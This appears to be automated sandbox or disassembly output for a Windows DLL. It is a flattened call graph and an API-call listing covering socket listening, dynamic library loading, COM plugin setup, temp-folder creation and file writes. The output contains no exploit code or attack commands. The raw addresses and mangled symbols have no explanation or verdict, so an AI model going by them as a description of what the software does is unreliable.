??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39617->39618 39618->39610 39620 1001b564 39621 1001b5b4 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39620->39621 39692 1006d306 39620->39692 39621->39617 39622 1001b5d4 39621->39622 39625 1001b5f4 lstrlen 39622->39625 39627 1001b5f0 39622->39627 39624 1001b5ad ??3@YAXPAX 39624->39621 39625->39627 39626 1001b61c CLSIDFromString 39629 1001b633 39626->39629 39630 1001b636 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39626->39630 39627->39626 39628 1001b576 39628->39617 39631 1001b5a1 RtlLeaveCriticalSection 39628->39631 39629->39630 39632 100269ac 39630->39632 39631->39617 39633 1001b659 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI 39632->39633 39634 1001b697 39633->39634 39635 1001b73e LoadLibraryW 39633->39635 39716 10001534 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@ ?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@ ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@ ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE __EH_prolog 39634->39716 39637 1001b75d 39635->39637 39638 1001b94f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39635->39638 39642 1001b927 Mailbox 39637->39642 39647 1001b78f 39637->39647 39638->39611 39640 1001b6b8 ?assign@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@ 
??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39641 1001b6f5 39640->39641 39643 100013d0 4 API calls 39641->39643 39644 1001b934 FreeLibrary 39642->39644 39645 1001b70a ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39643->39645 39644->39638 39646 1001b949 39644->39646 39645->39635 39646->39638 39648 1001b7c2 RtlLeaveCriticalSection 39647->39648 39649 1001b7cc 39647->39649 39648->39649 39650 1001b882 39649->39650 39653 1001b7e2 39649->39653 39651 1001b8b4 Mailbox 39650->39651 39652 1001b8aa RtlLeaveCriticalSection 39650->39652 39654 1001b8c1 FreeLibrary 39651->39654 39652->39651 39655 1001b81e RtlLeaveCriticalSection 39653->39655 39658 1001b828 39653->39658 39656 1001b8dc ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39654->39656 39657 1001b869 39654->39657 39655->39658 39656->39618 39657->39656 39658->39657 39659 1001b499 53 API calls 39658->39659 39659->39658 39661->39608 39717 10025930 39662->39717 39664 1001830b ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39665 10018328 39664->39665 39666 1001834a ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39664->39666 39667 100258ac 3 API calls 39665->39667 39668 10018358 39666->39668 39669 1001837e ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39666->39669 39688 1001832f 39667->39688 39672 100258ac 3 API calls 39668->39672 39670 1001838c 39669->39670 39671 100183af 
??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39669->39671 39673 100258ac 3 API calls 39670->39673 39674 100183d5 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39671->39674 39675 100183bd 39671->39675 39672->39688 39673->39688 39676 100183e3 39674->39676 39677 10018409 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39674->39677 39678 100258ac 3 API calls 39675->39678 39679 100258ac 3 API calls 39676->39679 39680 10018417 39677->39680 39681 1001843d ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39677->39681 39678->39688 39679->39688 39684 100258ac 3 API calls 39680->39684 39682 1001844b 39681->39682 39683 1001846a ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39681->39683 39685 100258ac 3 API calls 39682->39685 39686 10018497 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39683->39686 39687 10018478 39683->39687 39684->39688 39685->39688 39686->39688 39690 100184a5 39686->39690 39689 100258ac 3 API calls 39687->39689 39688->39620 39689->39688 39691 100258ac 3 API calls 39690->39691 39691->39688 39718 10025930 39692->39718 39694 1006d310 AtlComPtrAssign 39696 1006d340 39694->39696 39695 1001b572 39695->39624 39695->39628 39696->39695 39719 10071d00 39696->39719 39698 1006d4a8 39726 1006d1c4 39698->39726 39700 1006d4af AtlComPtrAssign 39730 100716f0 39700->39730 39702 1006d4c8 39734 1006d23c 39702->39734 39716->39640 39717->39664 39718->39694 39720 10071d1f 39719->39720 39723 10071d58 39719->39723 39721 100258ac 3 API calls 39720->39721 39722 10071d26 39721->39722 39722->39723 39765 10071bb0 8 API calls 39722->39765 39723->39698 39725 
10071d44 39725->39698 39727 100258ac 3 API calls 39726->39727 39728 1006d1cb AtlComPtrAssign 39727->39728 39728->39700 39731 1007170f 39730->39731 39733 10071716 39730->39733 39732 100258ac 3 API calls 39731->39732 39732->39733 39733->39702 39735 1006d245 39734->39735 39738 1006d25c 39734->39738 39765->39725 39788 1013c6f0 GetCurrentThreadId 39791 1013c728 39788->39791 39789 1013c74d WSAWaitForMultipleEvents 39790 1013c762 39789->39790 39789->39791 39791->39789 39792 1013c77a WSAEnumNetworkEvents 39791->39792 39792->39791 39793 1013c78d WSAGetLastError 39792->39793 39793->39791 39794 437120 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39795 418004 39794->39795 39796 437165 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39795->39796 39797 43717e 39796->39797 39798 43718f ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39797->39798 39799 4371a4 39798->39799 39800 4371c4 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39799->39800 39801 4371ab ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39799->39801 39802 418004 39800->39802 39803 4371bd 39801->39803 39804 4371e4 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39802->39804 39803->39800 39805 437205 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39803->39805 39808 4371fd 39804->39808 39806 418004 39805->39806 39807 437225 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39806->39807 39807->39808 39809 10049460 39810 10049472 39809->39810 39811 100494cc 39810->39811 39814 10049270 39810->39814 39815 10048b40 5 API calls 39814->39815 39816 10049292 39815->39816 39817 100258ac 3 API calls 39816->39817 39818 1004929b 39817->39818 39819 100492ba 39818->39819 39827 10049060 10 API calls 39818->39827 39821 100492d2 AcceptEx 39819->39821 39822 100492ff WSAGetLastError 39821->39822 39823 1004934b 39821->39823 39822->39823 39824 1004930f 
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39822->39824 39825 1021adf0 39824->39825 39826 1004933c _CxxThrowException 39825->39826 39826->39823 39827->39819 39828 10040560 39831 10050810 2 API calls 39828->39831 39832 10048bf0 39828->39832 39829 10040576 39831->39829 39833 10048c23 socket 39832->39833 39834 10048c39 htons bind 39832->39834 39833->39834 39835 10048c84 WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39834->39835 39836 10048cca 39834->39836 39837 1021adf0 39835->39837 39838 10048d3e listen 39836->39838 39839 10048ccf getsockname 39836->39839 39840 10048cbb _CxxThrowException 39837->39840 39843 10048d95 39838->39843 39844 10048d4f WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39838->39844 39841 10048cf3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39839->39841 39842 10048d2c htons 39839->39842 39840->39836 39847 1021adf0 39841->39847 39842->39838 39846 10025980 2 API calls 39843->39846 39845 1021adf0 39844->39845 39848 10048d83 _CxxThrowException 39845->39848 39849 10048db3 39846->39849 39850 10048d1d _CxxThrowException 39847->39850 39848->39843 39849->39829 39850->39842 39851 100491e0 39853 100491f2 39851->39853 39852 10049218 39857 1003c190 39852->39857 39853->39852 39854 10048b40 5 API calls 39853->39854 39854->39852 39858 1003c1d0 39857->39858 39859 1003c230 RtlEnterCriticalSection 39858->39859 39861 1003c219 39858->39861 39860 1003c258 39859->39860 39886 1003c2b7 39860->39886 39897 100394e0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39860->39897 39862 10025980 2 API calls 39861->39862 39863 1003c625 39862->39863 39864 1003c5ff RtlLeaveCriticalSection 39864->39861 39866 1003c2f4 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ GetTickCount 39867 10039640 20 API calls 39866->39867 39868 
1003c350 ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@H ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH 39867->39868 39869 1003c534 ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 39868->39869 39870 1003c39e 39868->39870 39871 1003c557 39869->39871 39872 1003c55e inet_addr 39869->39872 39870->39869 39873 1003c3b5 ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD 39870->39873 39871->39872 39874 1003c56a 39872->39874 39873->39869 39875 1003c3dc 39873->39875 39898 10039b70 39874->39898 39875->39869 39877 1003c3e7 ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH 39875->39877 39877->39869 39879 1003c406 39877->39879 39878 1003c596 39881 1003c5c4 39878->39881 39882 1003c5df 39878->39882 39879->39869 39880 1003c41d ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD 39879->39880 39880->39869 39883 1003c43e 39880->39883 39902 10039540 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??3@YAXPAX ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE Mailbox 39881->39902 39903 10039540 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??3@YAXPAX ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE Mailbox 39882->39903 39883->39869 39885 1003c449 ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH 39883->39885 39885->39869 39888 1003c468 39885->39888 39886->39864 39888->39869 39889 1003c47f ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD 39888->39889 39889->39869 39890 1003c4a0 39889->39890 39890->39869 39891 1003c4ab ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH 39890->39891 39891->39869 39892 
1003c4c6 39891->39892 39892->39869 39893 1003c4d5 ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD 39892->39893 39893->39869 39894 1003c4f2 39893->39894 39894->39869 39895 1003c4f9 ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD 39894->39895 39895->39869 39896 1003c516 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II 39895->39896 39896->39869 39897->39866 39901 10039b8b 39898->39901 39900 10039bc0 39900->39878 39904 10039910 39901->39904 39902->39886 39903->39886 39905 10039934 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0exception@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ _CxxThrowException 39904->39905 39906 1003998d 39904->39906 39905->39906 39909 10039870 39906->39909 39908 100399a7 39908->39900 39910 100258ac 3 API calls 39909->39910 39911 10039898 39910->39911 39912 100398cf 39911->39912 39914 100395a0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 39911->39914 39912->39908 39914->39912 39915 10114674 39916 10114685 39915->39916 39917 1011467e ??3@YAXPAX 39915->39917 39917->39916 39918 10001b65 39924 10025930 39918->39924 39920 10001b6f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI 39925 10015899 39920->39925 39922 10001bad ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39923 10001bcf 39922->39923 39924->39920 39926 100158a3 __EH_prolog 39925->39926 39935 1000104f RtlEnterCriticalSection 39926->39935 39928 100158b6 39929 100013d0 4 API calls 39928->39929 39930 100158ca 39929->39930 39936 100155da 
??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 39930->39936 39932 100158de ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39933 10015909 RtlLeaveCriticalSection 39932->39933 39934 100158f2 39932->39934 39933->39922 39934->39933 39935->39928 39936->39932 39937 42e8ab GetTempPathW 39938 42e907 lstrcatW GetFileAttributesW 39937->39938 39939 42e8f8 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W 39937->39939 39941 42e934 lstrcatW ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W 39938->39941 39942 42e928 CreateDirectoryW 39938->39942 39940 42e94c 39939->39940 39941->39940 39942->39941 39962 425a30 39963 4182d4 39962->39963 39964 425a70 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39963->39964 39965 425a8e 39964->39965 39966 425a9b ?assign@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@ 39965->39966 39967 418004 39966->39967 39968 425ad0 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39967->39968 39969 418004 39968->39969 39970 425ae9 ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W 39969->39970 39971 425b00 39970->39971 39972 425b3a ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39971->39972 39973 418004 39972->39973 39974 425b56 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39973->39974 39975 425b68 39974->39975 39976 425bb6 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39975->39976 39977 425b75 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39975->39977 39979 418004 39976->39979 39978 418004 39977->39978 39980 425b92 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39978->39980 
39981 425bc8 LoadLibraryW 39979->39981 39988 425bab 39980->39988 39982 425bd8 39981->39982 39983 425cb3 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39982->39983 39984 425be5 GetProcAddress 39982->39984 39985 418004 39983->39985 39990 425bfd 39984->39990 39986 425cd2 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39985->39986 39986->39988 39987 425ca0 FreeLibrary 39989 418004 39987->39989 39989->39983 39990->39987 39991 425c19 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI 39990->39991 39992 425c58 39991->39992 39993 425c87 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39992->39993 39994 425c67 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 39992->39994 39996 418004 39993->39996 39995 425c83 39994->39995 39995->39993 39996->39987 39997 10026cf0 39998 10026dc5 39997->39998 39999 10026d1b WriteFile 39997->39999 40000 10026d79 39999->40000 40001 10026d39 GetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39999->40001 40000->39998 40003 10026d7f GetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 40000->40003 40002 1002bc50 40001->40002 40004 10026d6a _CxxThrowException 40002->40004 40005 1002bc50 40003->40005 40004->40000 40006 10026db3 _CxxThrowException 40005->40006 40006->39998 40007 100266f0 40008 10025ed0 40007->40008 40009 1002670f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 40008->40009 40010 10026774 40009->40010 40011 10026782 GetPrivateProfileSectionA 40010->40011 40012 100267b1 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII 
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II 40011->40012 40013 1002688c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 40011->40013 40019 100267f2 40012->40019 40014 10025980 2 API calls 40013->40014 40015 100268e9 40014->40015 40016 10026847 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II 40016->40019 40017 10026800 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 40017->40019 40018 10026823 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 40018->40019 40019->40012 40019->40016 40019->40017 40019->40018 40020 10026888 40019->40020 40020->40013 40021 422db0 40022 422df1 40021->40022 40023 422e10 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40022->40023 40024 422e38 CloseHandle 40022->40024 40028 422e30 40023->40028 40025 418004 40024->40025 40026 422e4b ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40025->40026 40027 422e6b 40026->40027 40027->40028 40029 4255b0 40030 4182d4 40029->40030 40031 4255ec ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40030->40031 40032 425608 40031->40032 40033 425612 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40032->40033 40034 42562d 40033->40034 40035 425637 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W 40034->40035 40036 425658 40035->40036 40037 425699 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40036->40037 40038 4256b5 40037->40038 40039 425789 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40038->40039 40040 4256cc ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40038->40040 40041 418004 40039->40041 40049 4256e1 40040->40049 40042 4257a2 
??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40041->40042 40043 418004 40042->40043 40044 4257bb ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40043->40044 40045 418004 40044->40045 40046 4257d1 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40045->40046 40047 418004 40046->40047 40048 4257e7 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40047->40048 40050 425800 40048->40050 40051 42570a ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40049->40051 40052 418004 40051->40052 40053 42571c ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40052->40053 40054 418004 40053->40054 40055 425732 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40054->40055 40056 418004 40055->40056 40057 425747 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40056->40057 40058 42575a 40057->40058 40059 425767 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 40058->40059 40060 42577c 40059->40060 40060->40039 40061 1003d2f0 40066 1003d1d0 40061->40066 40064 1003d308 40065 1003d2ff ??3@YAXPAX 40065->40064 40067 1003d204 40066->40067 40074 100352a0 RtlEnterCriticalSection 40067->40074 40069 1003d22b 40070 1003d232 ??_V@YAXPAX 40069->40070 40073 1003d244 40069->40073 40070->40073 40071 1003d285 40071->40064 40071->40065 40072 1003d26a ??3@YAXPAX 40072->40071 40073->40071 40073->40072 40075 100348d0 40074->40075 40076 100352e6 RtlLeaveCriticalSection 40075->40076 40076->40069 40077 10055df0 40078 10055e07 inet_addr 40077->40078 40079 10055dfc 40077->40079 40083 10055e21 40078->40083 40093 10055d90 40079->40093 40081 10055e05 40084 10055e47 40083->40084 40100 10055120 95 API calls 40084->40100 40086 10055e4d 40087 10055e54 40086->40087 40088 10055e5f 40086->40088 40089 10055d90 130 API calls 40087->40089 40090 10059880 166 API calls 40088->40090 40091 10055e5d 40089->40091 40092 10055e65 
40090->40092 40094 10055a20 116 API calls 40093->40094 40095 10055d9f 40094->40095 40097 10055950 104 API calls 40095->40097 40099 10055db1 40095->40099 40096 10055dbb SetEvent 40098 10055dc9 40096->40098 40097->40099 40098->40081 40099->40096 40099->40098 40100->40086

Control-flow Graph

[Control-flow graph 841, starting at block 1001d704; legend: Executed / Not Executed]
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001D709
                                                                                                                                                • Part of subcall function 1001694C: RtlEnterCriticalSection.NTDLL(?), ref: 1001695C
                                                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 1001D759
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 1001D7AD
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001D7C1
                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000000), ref: 1001D7D0
                                                                                                                                              • CoCreateInstance.COMBASE(1029610C,00000000,00000001,1029611C,?), ref: 1001D7FA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1001D90B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D931
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1001D972
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1001D984
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,asyn_frame.dll), ref: 1001D996
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001DA63
                                                                                                                                                • Part of subcall function 1001C6DC: __EH_prolog.LIBCMT ref: 1001C6E1
                                                                                                                                                • Part of subcall function 1001C6DC: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(count), ref: 1001C70C
                                                                                                                                                • Part of subcall function 1001C6DC: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(com_plugin), ref: 1001C71F
                                                                                                                                                • Part of subcall function 1001C6DC: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C74A
                                                                                                                                                • Part of subcall function 1001C6DC: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C75A
                                                                                                                                                • Part of subcall function 1001C6DC: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(dll_), ref: 1001C78E
                                                                                                                                                • Part of subcall function 1001C6DC: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1001C7AF
                                                                                                                                                • Part of subcall function 1001C6DC: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C7BF
                                                                                                                                                • Part of subcall function 1001C6DC: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1001C7D1
                                                                                                                                                • Part of subcall function 1001C6DC: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(com_plugin), ref: 1001C7E2
                                                                                                                                                • Part of subcall function 1001C6DC: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,?), ref: 1001C818
                                                                                                                                                • Part of subcall function 1001C6DC: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C828
                                                                                                                                                • Part of subcall function 1001C6DC: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C838
                                                                                                                                                • Part of subcall function 1001C6DC: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C848
                                                                                                                                                • Part of subcall function 1001C6DC: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(clsid_), ref: 1001C856
                                                                                                                                              • GetTickCount.KERNEL32 ref: 1001DA73
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001DB16
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 1001DB3C
                                                                                                                                              • ??0?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000002,00000001), ref: 1001DB66
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 1001DB7D
